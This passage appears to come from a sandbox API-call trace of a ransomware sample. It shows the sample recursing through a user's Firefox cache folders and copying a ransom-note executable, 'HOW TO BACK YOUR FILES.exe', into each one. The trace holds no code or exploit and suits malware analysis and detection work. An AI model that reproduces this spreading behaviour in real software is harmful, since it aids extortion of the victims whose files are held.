Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" [0104.549] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.549] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.550] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.550] GetLastError () returned 0x0 [0104.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbece2650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d7e9e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d7e9e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.551] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" [0104.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" [0104.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.552] GetLastError () returned 0x0 [0104.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6baaebe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6baaebe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.552] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.553] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" [0104.553] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" [0104.553] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.553] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.553] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.554] GetLastError () returned 0x0 [0104.554] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d85c220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d85c220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.554] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.554] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.554] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" [0104.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" [0104.554] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.554] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.555] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.555] GetLastError () returned 0x0 [0104.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82329dd0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bad4d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bad4d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.556] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" [0104.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" [0104.556] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.556] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.557] GetLastError () returned 0x0 [0104.557] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.557] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bad4d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bad4d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.557] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.557] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.558] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" [0104.558] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" [0104.558] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.558] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.558] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.559] GetLastError () returned 0x0 [0104.559] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.559] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.559] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.559] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.559] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" [0104.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" [0104.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.560] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.560] GetLastError () returned 0x0 [0104.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.561] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bafaea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bafaea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.562] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" [0104.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" [0104.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.564] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.564] GetLastError () returned 0x0 [0104.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.565] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.565] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.565] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" [0104.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" [0104.565] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.565] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.566] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.566] GetLastError () returned 0x0 [0104.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.566] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e671d0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bafaea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bafaea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.566] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.567] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" [0104.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" [0104.567] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO 